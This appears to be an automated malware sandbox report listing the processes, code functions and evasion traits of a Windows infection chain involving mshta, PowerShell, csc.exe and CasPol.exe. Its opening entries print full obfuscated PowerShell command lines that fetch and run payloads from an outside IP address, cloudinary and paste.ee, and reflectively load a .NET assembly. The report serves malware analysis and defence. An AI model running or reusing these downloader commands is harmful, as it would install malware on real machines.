                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovalsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.cmdline"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.cmdline"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,11_2_0041BCF3
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_02E40CE5 pushfd ; iretd 8_2_02E40CEA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00434006 push ecx; ret 11_2_00434019
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_004567F0 push eax; ret 11_2_0045680E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0045B9DD push esi; ret 11_2_0045B9E6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00455EBF push ecx; ret 11_2_00455ED2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00406128 ShellExecuteW,URLDownloadToFileW,11_2_00406128
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,11_2_00419BD4

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,11_2_0041BCF3
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
